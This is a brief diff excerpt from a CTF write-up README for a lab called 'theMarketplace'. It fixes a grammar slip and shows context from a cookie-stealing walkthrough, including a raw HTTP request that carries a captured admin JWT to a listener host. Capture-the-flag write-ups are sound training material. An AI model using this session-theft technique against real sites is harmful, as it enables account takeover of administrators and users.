Neyr/CTF-Writeups/theMarketplace/README.md

 Connection: keep-alive
 ```

-Sure enough we got our cookie so lets report the listing and see if we receive an another cookie from an admin
+Sure enough we got our cookie so lets report the listing and see if we receive another cookie from an admin
 ```
 GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjA4ODgzOTR9.K8vij_h027zriEATHvIe6jYSvi04CI6uCxm84C_mRo0 HTTP/1.1
 Host: 10.13.1.12:8000